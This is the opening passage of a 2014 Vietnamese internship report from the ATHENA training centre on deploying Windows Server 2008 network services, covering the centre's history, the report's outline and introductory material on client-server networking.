Bao cao ck update final

TRUNG TẦM ĐÀO TẠO QUẢN TRỊ MẠNG VÀ AN NINH MẠNG QUỐC TẾ

ATHENA

BÁO CÁO THỰC TẬP

CUỐI KHÓA

NGHIÊN CỨU VÀ TRIỂN KHAI CÁC

DỊCH VỤ MẠNG TRÊN WINDOWS

SERVER 2008

Sinh viên thực hiện : Nguyễn Đình Duy

MSSV : 11145941

Lớp : NCTH5E

GVHD : Võ Đỗ Thắng

TP. Hồ Chí Minh, Tháng 3 năm 2014.

TRUNG TÂM ĐÀO TẠO MẠNG & AN NINH MẠNG QUỐC TẾ ATHENA

CỘNG HÒA XÃ HỘI CHỦ NGHĨA VIỆT NAMĐộc lập – Tự do – Hạnh phúc

NHIỆM VỤ THỰC HIỆN KHÓA LUẬN

Họ tên SV : Nguyễn Đình Duy. MSSV: 11145941.Chuyên ngành: Công Nghệ Thông Tin.Tên đề tài: Nghiên cứu triển khai các dịch vụ mạng trên Windows Server 2008.Nội dung thực hiện:Lý thuyết:Nắm vững các bước thực hiện quản trị Windows Server 2008.Có khả năng tự thiết lập một mạng máy tính, cấu hình mạng, điều chỉnh khả năng hoạt động mạng máy tính, vận hành hệ thống mạng, giải quyết sự cố, các phương pháp bảo vệ trước nguy cơ virus, worm, trojan, spam.Thực hành: Cài đặt Windows Server 2008.Nâng cấp Stand Alone thành Domain controller.Cài đặt Windows 7.Join Domain cho windows 7.Tạo user account trên AD, thiết lập policy cho phép User được quyền thay đổi ngày giờ hệ thống.Backup cho Domain Controller.Quản lý dịch vụ DNS, Mail, DHCP, Web, VPN trên môi trường Local và Internet.Thực hiện kết nối VPN, Mail Server, Web Server trên máy chủ ảo VPS.Bảo mật Windows với khai thác mã lỗi trên Windows Xp (MS10_042,MS12_004,MS12_027 và lỗi Adobe Reader9.X)

Thời gian thực hiện: 16/12/2013 đến 10/3/2014.Chữ ký của SV:

TP.HCM, Ngày 3 tháng 3 năm 2014.

GIÁM ĐỐC TRUNG TÂM GIẢNG VIÊN HƯỚNG DẪN(Ký và ghi rõ họ tên) (Ký và ghi rõ họ tên)

LỜI CẢM ƠN

Trên thực tế không có sự thành công nào mà không gắn liền với những sự hỗ trợ, giúp đỡ dù ít hay nhiều, dù trực tiếp hay gián tiếp của người khác. Trong suốt thời gian từ khi bắt đầu học tập ở giảng đường đến nay, em đã nhận được rất nhiều sự quan tâm, giúp đỡ của quý Thầy Cô, gia đình và bạn bè. Với lời biết ơn sâu sắc nhất, em xin gửi đến quý Thầy Cô ở Khoa Công Nghệ Thông Tin - Trường Đại Học Công Nghiệp Thành Phố Hồ Chí Minh đã cùng với tri thức và tâm huyết của mình để truyền đạt vốn kiến thức quý báu cho chúng em trong suốt thời gian học tập tại trường. Và đặc biệt, trong học kỳ này Khoa đã tổ chức cho chúng em thực tập và được tiếp cận với môn học mà theo em là rất hữu ích đối với sinh viên ngành Công Nghệ Thông Tin.

Em xin chân thành cảm ơn Thầy Võ Đỗ Thắng đã tận tâm hướng dẫn chúng em qua từng buổi thực tập tại Trung Tâm ATHENA cũng như những buổi nói chuyện, thảo luận. Nếu không có những lời hướng dẫn, dạy bảo của thầy thầy thì em nghĩ bài báo cáo này của em rất khó có thể hoàn thiện được. Một lần nữa, em xin chân thành cảm ơn thầy.

Bài báo cáo được thực hiện trong khoảng thời gian gần 3 tháng. Bước đầu đi vào thực tế, tìm hiểu, kiến thức của em còn hạn chế và còn nhiều bỡ ngỡ. Do vậy, không tránh khỏi những thiếu sót là điều chắc chắn, em rất mong nhận được những ý kiến đóng góp quý báu của quý Thầy Cô và các bạn học cùng lớp để kiến thức của em trong lĩnh vực này được hoàn thiện hơn.

Sau cùng, em xin kính chúc quý Thầy Cô trong Khoa Công Nghệ Thông Tin và Thầy Võ Đỗ Thắng thật dồi dào sức khỏe, niềm tin để tiếp tục thực hiện sứ mệnh cao đẹp của mình là truyền đạt kiến thức cho thế hệ mai sau.

Trân trọng.

TP.HCM, Ngày 3 - 3 - 2014

Sinh viên thực hiện

Nguyễn Đình Duy

M c L cụ ụChương I. Công việc thực tập:........................................................................1

1.1 Giới thiệu doanh nghiệp thực tập – Trung Tâm Đào Tạo Quản Trị Mạng và An Ninh Mạng Quốc Tế ATHENA................................................1

1.1.1 Trụ sở và các chi nhánh:................................................................2

1.1.1.1 Trụ sở chính:...........................................................................2

1.1.1.2 Cơ sở 2_Tại TP Hồ Chí Minh:................................................2

1.1.2 Quá trình hình thành và phát triển của trung tâm:.........................2

1.1.3 Cơ cấu tổ chức:..............................................................................4

1.1.4 Các sản phẩm, giải pháp:...............................................................4

1.1.4.1 Các khóa học dài hạn:.............................................................4

1.1.4.2 Các khóa học ngắn hạn:..........................................................5

1.1.4.2.1 Khóa Quản trị mạng :.........................................................5

1.1.4.2.2 Khóa thiết kế web và bảo mật mạng..................................5

1.1.4.3 Các sản phẩm khác..................................................................5

1.1.4.4 Cơ sở hạ tầng...........................................................................5

1.1.4.5 Các dịch vụ hỗ trợ:..................................................................6

1.1.5 Khách hàng....................................................................................6

1.1.6 Đối tác............................................................................................6

Trung tâm đào tạo an ninh mạng ATHENA là đối tác đào tạo & cung cấp nhân sự CNTT,.................................................................................6

1.2 Các nhiệm vụ và dịch vụ của bộ phận thực tập...................................6

1.3 Công việc và nhiệm vụ được phân công.............................................6

1.4 Thời gian thực tập................................................................................7

Chương II. Nội dung thực tập.......................................................................8

2.1 Nhiệm vụ được giao............................................................................8

2.2 Kiến thức tìm hiểu...............................................................................8

2.2.1 Giải pháp mạng doanh nghiệp.......................................................8

2.2.1.1 Giới thiệu về mạng doanh nghiệp...........................................8

2.2.1.2 Các thành phần công nghệ trong mạng doanh nghiệp............8

2.2.2 Windows Server 2008....................................................................9

2.2.2.1 Giới thiệu về mô hình Client-Server......................................9

2.2.2.2 Giới thiệu về Windows Server 2008.....................................12

2.3 Các công nghệ được tiếp xúc, quá trình làm việc và các kiến thức. .15

2.3.1 Làm việc với Windows Server 2008 trên môi trường máy ảo VMWare...................................................................................................15

2.3.1.1.1 Cài đặt và cấu hình máy chủ Windows Server 2008.......16

2.3.1.1.2 Khởi tạo cấu hình lần đầu tiên cho Windows Server 200825

2.3.1.1.3 Cài đặt dịch vụ DNS........................................................35

2.3.1.1.4 Dịch Vụ DHCP................................................................46

2.3.1.1.5 Cấu hình Web Server IIS.................................................58

2.3.1.1.6 Mail Server.......................................................................66

2.3.1.1.7 Kết nối VPN.....................................................................78

2.3.2 Làm việc với Winsdows Server 2008 trên máy chủ ảo VPS (Virtual private server)..............................................................................98

2.3.2.1 Mail Server trên máy chủ ảo VPS.......................................100

2.3.2.2 Kết Nối VPN thông qua máy chủ ảo VPS..........................112

2.3.2.3 Cài đặt và cấu hình Web Server trên VPS..........................132

2.3.3 Bảo mật Windows......................................................................143

2.3.3.1 Khai thác lỗ hổng trên Windows XP với mã lỗi MS10_042143

2.3.3.2 Khai thác lỗ hổng bảo mật Win XP mã lỗi MS12_004.......148

2.3.3.3 Khai thác lỗ hổng trên Win XP với lỗi Adobe Reader 9.X.154

2.3.3.4 Khai thác lỗ hổng trên Win XP với mã lỗi MS12_027.......159

2.4 Các kết quả đạt được.......................................................................164

2.4.1 Kinh nghiệm thực tế...................................................................165

2.4.2 Hoàn thiện bản thân...................................................................165

2.4.3 Các kiến thức được lĩnh hội.......................................................165

Chương III. Kết Luận.................................................................................166

Chương IV. Tài liệu tham khảo..................................................................167

LỜI MỞ ĐẦU

Ngày nay với sự phát triển của khoa học kỹ thuật thì máy tính trở nên phổ biến với mọi người. Chúng mang lại cho con người khả năng to lớn và làm những công việc phi thường: tính toán nhanh và chính xác các bài toán phức tạp, điều khiển tự động, giải trí… Máy tính ra đời không chỉ hỗ trợ trong sản xuất mà còn trong việc học tập và làm góp phần giải phóng sức lao động. Máy tính điện tử là một phát minh, thành tựu to lớn cho sự phát triển của nhân loại góp phần thúc đẩy mạnh mẽ tiến bộ khoa học và kỹ thuật nói riêng cũng như nhân loại nói chung.

Bên cạnh sự phát triển chóng mặt của máy tính trong thời buổi công nghệ thông tin thì các ứng dụng, dịch vụ mạng là nền tản không thể tách rời. Sức mạnh máy tính có thể nhân lên gấp nhiều lần khi được kết nối thành mạng máy tính. Là cơ sở hạ tần cho phép trao đổi thông tin, truyền tải dữ liệu từ xa nhằm rút ngắn khoảng cách. Với mạng máy tính toàn cầu chúng ta dễ dàng tiếp cận với sự phát triển của thế giới trong đó có sự phát triển gần nhất của Windows Server là Windows Server 2000 và Windows Server 2003 và tiếp đến là Windows Server 2008 hỗ trợ tốt các dịch vụ mạng cần thiết trên Server, việc cải tiến không ngừng giúp nâng cao tính ổn định và an toàn hơn cho Windows Server 2008 hoạt động một cách trơn tru.

Hiện nay quá trình công nghiệp hóa hiện đại hóa đất nước là một chủ trương hàng đầu của nhà nước. Mạng máy tính trở thành mục tiêu nghiên cứu và phát triển. Cốt lõi là ngành công nghệ thông tin bao gồm nhiều lĩnh vực từ kiến trúc mạng đến nguyên lý thiết kế, cài đặt mô hình ứng dụng v.v… Mạng viễn thông nói chung và mạng máy tính trên nền tảng Windows Server 2008 nói riêng là công cụ hũu dụng không thể thiếu trong bộ máy nhà nước, trường học, doanh nghiệp… Nó đóng vai trò cầu nối trao đổi thông tin giữa các chính phủ, tổ chức xã hội và mọi người với nhau.

Qua thời gian học tập và nghiên cứu trên ghế nhà trường cùng với sự hỗ trợ tận tình của Thầy cô, bạn bè và người thân đã giúp em thu thập được nhiều kiến thức quý báo. Đặc biệt là quá trình thực tập tại Trung tâm ATHENA giúp em có những trải nghiệm vô cùng thú vị và bổ ích. Với mong muốn tìm hiểu về mạng máy tính và góp phần xây dựng một mạng máy tính thân thiện, thông minh cho mọi người sử dụng.

Tuy đã có nhiều cố gắng song không thể tránh những khuyết điểm, sai sót vì thế mong được sự thông cảm và những ý kiến đóng góp quý báo từ Quý Thầy Cô, bạn bè, bạn đọc, người thân để em có thể ngày một hoàn thiện bản thân mình hơn. Xin chân thành cảm ơn!

Chương I. Công việc thực tập:

1.1 Giới thiệu doanh nghiệp thực tập – Trung Tâm Đào Tạo Quản Trị Mạng

và An Ninh Mạng Quốc Tế ATHENA

Trung Tâm Đào Tạo Quản Trị Mạng và An Ninh Mạng Quốc Tế

ATHENA_Tiền thân là Công ty TNHH Tư vấn và Đào tạo quản trị mạng Việt

Năng, (tên thương hiệu viết tắt là TRUNG TÂM ĐÀO TẠO ATHENA),

được chính thức thành lập theo giấy phép kinh doanh số 4104006757 của Sở

Kế Hoạch Đầu Tư Tp Hồ Chí Minh cấp ngày 04 tháng 11 năm 2008.

Tên công ty viết bằng tiếng nước ngoài: ATHENA

ADVICE TRAINING NETWORK SECURITY COMPANY LIMITED.

ATHENA là một tổ chức quy tụ nhiều trí thức trẻ Việt Nam đầy năng

động, nhiệt huyết và kinh nghiệm trong lĩnh vực công nghệ thông tin. Với

quyết tâm góp phần vào công cuộc thúc đẩy tiến trình tin học hóa của nước

nhà. ATHENA đã và đang tập trung chủ yếu vào các họat động sau:

Đào tạo chuyên sâu quản trị mạng, an ninh mạng, thương mại điện tử theo các tiêu chuẩn quốc tế của các hãng nổi tiếng như Microsoft, Cisco, Oracle, Linux LPI , CEH,... Song song đó, trung tâm ATHENA còn có những chương trình đào tạo cao cấp dành riêng theo đơn đặt hàng của các đơn vị như Bộ Quốc Phòng, Bộ Công An , ngân hàng, doanh nghiệp, các cơ quan chính phủ, tổ chức tài chính..Qua đó cung cấp nguồn nhân lực trong lĩnh vực công nghệ thông tin, đặc biệt là chuyên gia về mạng máy tính và bảo mật mạng đạt trình độ quốc tế cho các tổ chức, doanh nghiệp có nhu cầu.

Tư vấn và hổ trợ cho doanh nghiệp ứng dụng hiệu quả tin học vào hoạt động

sản xuất kinh doanh.

Tiến hành các hoạt động nghiên cứu nâng cao kiến thức tin học và phát triển

cơ sở dữ liệu thông tin về các ứng dụng và sự cố mạng.

Tiến hành các dịch vụ ứng cứu khẩn cấp cho doanh nghiệp trong trường hợp

xảy ra sự cố máy tính.

Sau gần 10 năm hoạt động,nhiều học viên tốt nghiệp trung tâm ATHENA đã là chuyên gia đảm nhận công tác quản lý hệ thống mạng, an ninh mạng cho nhiều bộ ngành như Cục Công Nghệ Thông Tin - Bộ Quốc Phòng , Bộ Công An, Sở Thông Tin Truyền Thông các tỉnh, bưu điện các tỉnh,…

1

SVTT: Nguyễn Đình Duy

Ngoài ra, Trung tâm ATHENA còn có nhiều chương trình hợp tác và trao đổi công nghệ với nhiều đại học lớn như đại học Bách Khoa Thành Phố Hồ Chí Minh, Học Viện An Ninh Nhân Dân( Thủ Đức), Học Viện Bưu Chính Viễn Thông, Hiệp hội an toàn thông tin (VNISA), Viện Kỹ Thuật Quân Sự...

1.1.1 Trụ sở và các chi nhánh:1.1.1.1 Trụ sở chính:

Trung Tâm Đào Tạo Quản Trị Mạng và An Ninh Mạng Quốc Tế ATHENA.

Số 2 Bis Đinh Tiên Hoàng, Phường Đa Kao, Tp Hồ Chí Minh, Việt Nam.

Điện thoại: ( 84-8 ) 3824 4041

Hotline: 0943 23 00 99

1.1.1.2 Cơ sở 2_Tại TP Hồ Chí Minh: Trung Tâm Đào Tạo Quản Trị Mạng và An Ninh Mạng Quốc Tế ATHENA

92 Nguyễn Đình Chiểu ,Phường Đa Kao,Quận 1, Tp Hồ Chí Minh, Việt Nam.

Website: www.Athena.Edu.Vn

Điện thoại: ( 84-8 ) 2210 3801

Hotline: 0943 20 00 88

1.1.2 Quá trình hình thành và phát triển của trung tâm:

Một nhóm các thành viên là những doanh nhân tài năng và thành công trong lĩnh vực công nghệ thông tin đã nhận ra tiềm năng phát triển của việc đào tạo nền công nghệ thông tin nước nhà. Họ là những cá nhân có trình độ chuyên môn cao và có đầu óc lãnh đạo cùng với tầm nhìn xa về tương lai của ngành công nghệ thông tin trong tương lai, họ đã quy tụ được một lực lượng lớn đội ngũ công nghệ thông tin trước hết là làm nhiệm vụ ứng cứu máy tính cho các doanh nghiệp, cá nhân có nhu cầu. Bước phát triển tiếp theo là vươn tầm đào đạo đội ngũ cán bộ công nghệ thông tin cho đất nước và xã hội. Các thành viên sáng lập trung tâm gồm:

o Ông Nguyễn Thế Đông: Cựu giám đốc trung tâm ứng cứu máy tính Athena, hiện tại là giám đốc dự án của công ty Siemen Telecom.

o Ông Hứa Văn Thế Phúc: Phó Giám đốc Phát triển Thương mại Công ty EIS, Phó Tổng công ty FPT.

o Ông Nghiêm Sỹ Thắng: Phó Tổng giám đốc Ngân hàng Liên Việt, chịu trách nhiệm công nghệ thông tin của Ngân hàng.

o Ông Võ Đỗ Thắng: Hiện đang là giám đốc Trung tâm đào tạo quản trị và an ninh mạng Athena. Đến năm 2003, bốn thành viên sáng lập cùng với với đội ngũ ứng cứu máy tính gần 100 thành viên hoạt động như là một nhóm, một tổ chức ứng cứu máy tính miền Nam.

2


http://www.Athena.Edu.Vn/

Từ năm 2004- 2006: Trung tâm có nhiều bước phát triển và chuyển

mình. Trung tâm trở thành một trong những địa chỉ tin cậy của nhiều doanh

nghiệp nhằm cài đặt hệ thống an ninh mạng và đào tạo cho đội ngũ nhân viên

của các doanh nghiệp về các chương trình quản lý dự án MS Project 2003, kỹ

năng thương mại điện tử, bảo mật web… và là địa chỉ tin cậy của nhiều học

sinh_sinh viên đến đăng kí học. Đòi hỏi cấp thiết trong thời gian này của

Trung tâm là nâng cao hơn nữa đội ngũ giảng viên cũng như cơ sở để đáp ứng

nhu cầu ngày càng cao về công nghệ thông tin của đất nước nói chung, các

doanh nghiệp, cá nhân nói riêng.Năm 2004, công ty mở rộng hoạt động cung

cấp giải pháp, dịch vụ cho khu vực miền Trung thông qua việc thành lập văn

phòng đại diện tại Đà Nẵng.

Đến năm 2006: Trung tâm đào tạo quản trị và an ninh mạng Athena

mở ra thêm một chi nhánh tại Cư xá Nguyễn Văn Trỗi. Đồng thời tiếp tục

tuyển dụng đội ngũ giảng viên là những chuyên gia an ninh mạng tốt nghiệp

các trường đại học và học viện công nghệ thông tin uy tín trên toàn quốc, đồng

thời trong thời gian này Athena có nhiều chính sách ưu đãi nhằm thu hút đội

ngũ nhân lực công nghệ thông tin lành nghề từ các doanh nghiệp, tổ chức, làm

giàu thêm đội ngũ giảng viên của trung tâm.

Đến năm 2008: Hàng loạt các trung tâm đào tạo quản trị và an ninh mạng mọc lên, cùng với khủng hoảng kinh tế tài chính toàn cầu đã làm cho Trung tâm rơi vào nhiều khó khăn. Ông Nguyễn Thế Đông cùng Ông Hứa Văn Thế Phúc rút vốn khỏi công ty gây nên sự hoang man cho toàn bộ hệ thống trung tâm. Cộng thêm chi nhánh tại Cư xã Nguyễn Văn Trỗi hoạt động không còn hiệu quả phải đóng cửa làm cho trung tâm rơi từ khó khăn này đến khó khăn khác. Lúc này, với quyết tâm khôi phục lại công ty cũng như tiếp tục sứ mạng góp phần vào tiến trình tin học hóa của đất nước. Ông Võ Đỗ Thắng mua lại cổ phần của hai nhà đầu tư lên làm giám đốc và xây dựng lại trung tâm. Đây là một bước chuyển mình có ý nghĩa chiến lược của trung tâm. Mở ra một làn gió mới và một giai đoạn mới, cùng với quyết tâm mạnh mẽ và một tinh thần thép đã giúp ông Thắng vượt qua nhiều khó khăn ban đầu, giúp trung tâm đứng vững trong thời kì khủng hoảng.

3


Từ năm 2009 – nay: Cùng với sự lãnh đạo tài tình và đầu óc chiến lược. Trung tâm đào tạo quản trị và an ninh mạng dần được phục hồi và trở lại quỹ đạo hoạt động của mình. Đến nay, Trung tâm đã trở thành một trong những trung tâm đào tạo quản trị mạng hàng đầu Việt Nam. Cùng với sự liên kết của rất nhiều công ty, tổ chức doanh nghiệp, trung tâm trở thành nơi đào tạo và cung cấp nguồn nhân lực công nghệ thông tin cho xã hội. Từng bước thực hiện mục tiêu góp phần vào tiến trình tin học hóa nước nhà.

1.1.3 Cơ cấu tổ chức:

Hình 1.1 Sơ đồ tổ chức công ty

1.1.4 Các sản phẩm, giải pháp:

1.1.4.1 Các khóa học dài hạn:- Chương trình đào tạo chuyên gia an ninh mạng. ( AN2S) Athena network

security specialist.

- Chương trình Quản trị viên an ninh mạng (ANST) Athena netuwork security

Technician.

- Chuyên viên quản trị mạng nâng cao (ANMA) Athena network manager

Administrator.

4


1.1.4.2 Các khóa học ngắn hạn:1.1.4.2.1 Khóa Quản trị mạng :

- Quản trị mạng Microsoft căn bản ACBN

- Phần cứng máy tính, laptop, server

- Quản trị hệ thống mạng Microsoft MCSA Security.

- Quản trị mạng Microsoft nâng cao MCSE

- Quản trị window Vista

- Quản trị hệ thống Window Server 2008, 2012

- Lớp Master Exchange Mail Server

- Quản trị mạng quốc tế Cissco CCNA

- Quản trị hệ thống mạng Linux 1 và Linux 2.

1.1.4.2.2 Khóa thiết kế web và bảo mật mạng- Xây dựng, quản trị web thương mại điện tử với Joomla và VirtuMart

- Lập trình web với Php và MySQL

- Bảo mật mạng quốc tế ACNS

- Hacker mũ trắng

- Athena Mastering Firewall Security

- Bảo mật website.

1.1.4.3 Các sản phẩm khác- Chuyên đề thực hành sao lưu và phục hồi dữ liệu

- Chuyên đề thực hành bảo mật mạng Wi_Fi

- Chuyên đề Ghost qua mạng

- Chuyên đề xây dựng và quản trị diễn đàn

- Chuyên đề bảo mật dữ liệu phòng chống nội gián

- Chuyên đề quản lý tài sản công nghệ thông tin

- Chuyên đề kỹ năng thương mại điện tử.1.1.4.4 Cơ sở hạ tầng

- Thiết bị đầy đủ và hiện đại.

- Chương trình cập nhật liên tục, bảo đảm học viên luôn tiếp cận với những

công nghệ mới nhất.

5


- Phòng máy rộng rãi, thoáng mát.

1.1.4.5 Các dịch vụ hỗ trợ:

- Đảm bảo việc làm cho học viên tốt nghiệp khoá dài hạn

- Giới thiệu việc làm cho mọi học viên

- Thực tập có lương cho học viên khá giỏi

- Ngoài giờ học chính thức, học viên được thực hành thêm miễn phí, không giới

hạn thời gian

- Hỗ trợ kỹ thuật không thời hạn trong tất cả các lĩnh vực liên quan đến máy

tính, mạng máy tính, bảo mật mạng

- Hỗ trợ thi Chứng chỉ Quốc tế

1.1.5 Khách hàng

- Mọi đối tượng chuyên hoặc không chuyên về CNTT.- Khách hàng chủ yếu của ATHENA là các bạn học sinh, sinh viên và các cán

bộ công nhân viên chức yêu thích lĩnh vực công nghệ thông tin.

1.1.6 Đối tác

Trung tâm đào tạo an ninh mạng ATHENA là đối tác đào tạo & cung cấp nhân

sự CNTT, quản trị mạng , an ninh mạng chất lượng cao theo đơn đặt hàng

cho các đơn vị như ngân hàng, doanh nghiệp, các cơ quan chính phủ, tổ chức

tài chính...

1.2 Các nhiệm vụ và dịch vụ của bộ phận thực tập

Bộ phận thực tập : Bộ phận triển khai kỹ thuật.

Nhiệm vụ và dịch vụ:

Triển khai lắp đặt hệ thống mạng.

Bảo trì hệ thống mạng.

Tư vấn hỗ trợ quản trị hệ thống mạng.

1.3 Công việc và nhiệm vụ được phân công

Nghiên cứu các dịch vụ mạng trên Windows Server 2008.

6


http://tuyendung.com.vn/timvieclam/jobresult.aspx?jobmustmatch=1&keyword=qu%E1%BA%A3n%20tr%E1%BB%8B%20m%E1%BA%A1ng

Triển khai các dịch vụ mạng trên Windows Server 2008.

Yêu cầu nhiệm vụ: Có kiến thức tốt về Network, System, Security.

1.4 Thời gian thực tập

Từ ngày 16/12/2013 đến ngày 10/3/2013.

7


Chương II. Nội dung thực tập

8


1.5 NHIỆM VỤ ĐƯỢC GIAO

Nghiên cứu các dịch vụ mạng trên Windows Server 2008

Triển khai các dịch vụ mạng trên Windows Server 2008

1.6 KIẾN THỨC TÌM HIỂU

1.6.1 Giải pháp mạng doanh nghiệp

1.6.1.1 Giới thiệu về mạng doanh nghiệp

Hệ thống mạng của doanh nghiệp đơn giản hay phức tạp là tùy theo quy mô và

loại hình của doanh nghiệp. Ngày nay, các nhà cung ứng đã đưa ra rất nhiều

sự chọn lựa cho doanh nghiệp như cho phép doanh nghiệp tự trang bị, tự quản

lý hoặc sử dụng dịch vụ. Những doanh nghiệp lớn với hàng ngàn máy tính

cũng có những giải pháp quản lý đặc thù kết hợp cả phần cứng và phần mềm.

Hầu hết các doanh nghiệp đều có nhu cầu sử dụng các ứng dụng công nghệ

thông tin (CNTT) ở những mức độ khác nhau. Do vậy, họ sẽ có những nhu

cầu khác nhau về quản trị hệ thống mạng (network) của doanh nghiệp. Một hệ

thống được kiểm soát tốt sẽ làm giảm đáng kể chi phí hoạt động, nâng cao

hiệu quả cũng như độ tin cậy của hệ thống.

1.6.1.2 Các thành phần công nghệ trong mạng doanh nghiệpTùy vào qui mô lớn hay nhỏ của doanh nghiệp mà ta sẽ có những giải pháp

công nghệ và thiết kế sao cho phù hợp nhất.

Hiện nay, hầu hết các ứng dụng mới đều yêu cầu rất nhiều tài nguyên của hệ

thống và băng thông mạng, cũng như các yêu cầu về điều khiển, giám sát

mạng. Vậy làm thế nào để một doanh nghiệp vừa và nhỏ, với một số vốn đầu

tư ban đầu hạn chế, có thể tiếp cận được với các công nghệ hiện đại, bắt kịp sự

phát triển của thế giới.

1.6.2 Windows Server 2008

1.6.2.1 Giới thiệu về mô hình Client-ServerĐiều đáng ngạc nhiên là nhiều công ty ngày nay vẫn không quan tâm đến việc

thực hiện một mạng lưới client/server. Thay vào đó họ chỉ tiếp tục thêm vào

9


các máy trạm để thực hiện mô hình mạng peer-to-peer. Mạng peer-to-peer

không cung cấp cho bạn nhiều cách bảo mật và chia sẽ tài nguyên. Vì vậy,

không có gì ngạc nhiên khi họ thường có vấn đề với việc truy cập vào máy

trạm, bị mất dữ liệu do virus, spyware hay phải trải nghiệm việc internet bị

gián đoạn. Máy tính nối mạng theo mô hình peer-to-peer là đủ khi bạn chỉ có

một vài người dung trên mạng, nhưng khi có nhiều hơn 5 hoặc 6 người sử

dụng trên mạng của bạn, bạn thực sự phải xem xét đầu tư một máy chủ mạng.

Vậy lợi ích của mô hình Client-Server cụ thể là gì?

- Tập tin và an ninh mạng: Vai trò quan trọng nhất của một máy chủ tập tin là

an ninh mạng mà nó cung cấp. Bằng cách tạo ra các tài khoản người dùng cá

nhân và nhóm, có thể cấp quyền cho nhóm và cá nhân khai thác dữ liệu được

lưu trữ trên mạng, ngăn chặn người sử dụng trái phép truy cập tài liệu mà họ

không nên xem. Ví dụ, trong Folder chung thì group ketoan và group nhansu

có quyền truy cập ủa nhân viên…

10


-

Hình 1.2 Cấu hình NTFS Permission

- Tăng độ tin cậy, giảm sự gián đoạn công việc: Nhiều máy chủ được trang bị

nguồn điện dự phòng. Với một nguồn cung cấp năng lượng thứ cấp chạy song

song, sự mất mát của một trong những nguồn cung cấp điện không ảnh hưởng

đến hoạt động hệ thống bình thường. Cũng vậy với hệ thống lưu trữ của máy

chủ. Không giống như một máy tính để bàn trung bình có sử dụng một ổ cứng

duy nhất, một máy chủ sẽ thường sử dụng nhiều ổ đĩa cứng làm việc trong một

RAID cấu hình để ngăn ngừa mất dữ liệu hoặc một sự gián đoạn trong quy

trình làm việc. Ngoài ra, nhiều máy chủ cũng được trang bị ổ đĩa cứng hot

swappable và nguồn cung cấp điện. Các thành phần này có thể thay thế nóng

cho phép bạn thay thế phần cứng bị lỗi mà không gián đoạn toàn bộ văn

phòng. Ngoài ra, kể từ khi tất cả các dữ liệu nhân viên đang được lưu trữ trên

11


mạng, nếu máy trạm của người dùng không giữa ngày làm việc, nhân viên có

thể truy cập các tập tin tương tự từ máy trạm khác.

- Tập trung lưu trữ dữ liệu và tài nguyên chia sẻ: Với một máy chủ mạng, tất

cả người dùng trên mạng có thể sử dụng các tài nguyên mạng khác nhau ngay

từ bàn làm việc, tăng hiệu quả. Một số trong những nguồn tài nguyên bao

gồm:

o Tập trung lưu trữ dữ liệu ( RAID Array )

o Network Attached Storage (NAS) thiết bị

o Tháp đĩa CD / DVD

o Máy in và máy chủ Fax

- Quản lý virus : Một trong những mối đe dọa lớn nhất đối với mạng của bạn là

khả năng lây nhiễm từ virus, phần mềm gián điệp và thư rác. Vì vậy, có tốt,

cập nhật, phần mềm chống virus được cài đặt trên hệ thống của bạn là một

điều cần thiết. Trong một văn phòng của 10 người hoặc ít hơn, hệ thống có thể

được duy trì riêng. Bất cứ điều gì nhiều hơn thế, tuy nhiên, có thể trở thành

một gánh nặng thực sự. Trong những trường hợp này, một gói phần mềm

chống virus kết hợp máy trạm và bảo vệ chống virus máy chủ vào một giải

pháp duy nhất có ý nghĩa hơn.

- Sao lưu tập trung: Tất cả các doanh nghiệp nên sao lưu dữ liệu của họ một

cách thường xuyên. Bởi có tất cả các công ty của bạn và dữ liệu nhân viên

được lưu trữ tại một địa điểm, bản sao lưu có thể được thực hiện đáng tin cậy

và nhanh chóng. Vì vậy, bạn sẽ không bao giờ cần phải lo lắng về những dữ

liệu được lưu trữ trên những gì máy trạm như bạn làm trong một mạng peer-

to-peer. Ngày nay, hầu hết các loại phương tiện truyền thông có thể được sử

dụng cho mục đích sao lưu. Ngoài các ổ đĩa truyền thống băng, đĩa CD, DVD,

lưu trữ và thậm chí loại bỏ Network Attached Storage (NAS) thiết bị này là

chấp nhận được. Sự lựa chọn của bạn của phương tiện truyền thông sẽ phụ

thuộc vào yêu cầu cụ thể của bạn sao lưu. Tùy thuộc vào ngân sách của bạn và

nhu cầu lưu giữ dữ liệu của bạn, bất kỳ trong số này sẽ là một giải pháp chấp

12


nhận được. Hãy chắc chắn rằng bạn có ít nhất một bản sao lưu hàng tuần theo

lịch trình, mặc dù hàng ngày sẽ tốt hơn.

1.6.2.2 Giới thiệu về Windows Server 2008Window Server 2008 là hệ điều hành Windows Server tân tiến nhất cho tới thời điểm này, được thiết kế nhằm tăng sức mạnh cho các mạng, ứng dụng và dịch vụ Web thế hệ mới. Với Windows Server 2008, bạn có thể phát triển, cung cấp và quản lý các trải nghiệm người dùng và ứng dụng phong phú, đem tới một hạ tầng mạng có tính bảo mật cao, và tăng cường hiệu quả về mặt công nghệ và giá trị trong phạm vi tổ chức của mình.Windows Server 2008 kế thừa những thành công và thế mạnh của các hệ điều hành Windows Server thế hệ trước, đồng thời đem tới tính năng mới có giá trị và những cải tiến mạnh mẽ cho hệ điều hành cơ sở này. Công cụ Web mới, công nghệ ảo hóa, tính bảo mật tăng cường và các tiện ích quản lý giúp tiết kiệm thời gian, giảm bớt các chi phí, và đem tới một nền tảng vững chắc cho hạ tầng Công nghệ Thông tin (CNTT) của bạn.

Nền tảng chắc chắn dành cho doanh nghiệpWindows Server 2008 đem tới một nền tảng chắc chắn đáp ứng tất cả các yêu cầu về ứng dụng và chế độ làm việc cho máy chủ, đồng thời dễ triển khai và quản lý. Thành phần mới Server Manager cung cấp một console quản lý hợp nhất, đơn giản hóa và sắp xếp một cách hợp lý việc cài đặt, cấu hình và quản lý liên tục cho máy chủ. Windows PowerShell, một shell mới kiểu dòng lệnh, giúp quản trị viên tự động hóa các tác vụ thường trình về quản trị hệ thống trên nhiều máy chủ. Windows Deployment Services đem tới một phương tiện bảo mật cao, đơn giản hóa để nhanh chóng triển khai hệ điều hành này qua các bước cài đặt trên nền mạng.Thêm vào đó, các wizard Failover Clustering của Windows Server 2008, và việc hỗ trợ đầy đủ cho Giao thức Internet phiên bản 6 (gọi tắt là IPv6) cộng với khả năng quản lý hợp nhất Network Load Balancing khiến dễ dàng triển khai với tính sẵn có cao, thậm chí bởi những người có hiểu biết chung nhất về CNTT.Tùy chọn cài đặt mới Server Core của Windows Server 2008 cho phép cài đặt các vai trò máy chủ chỉ với những thành phần và hệ thống phụ cần thiết mà không cần giao diện người dùng. Việc có ít hơn các vai trò và đặc tính đồng nghĩa với việc giảm thiểu công việc cho ổ đĩa và dịch vụ, đồng thời giảm bớt các bề mặt tấn công. Sản phẩm cũng cho phép 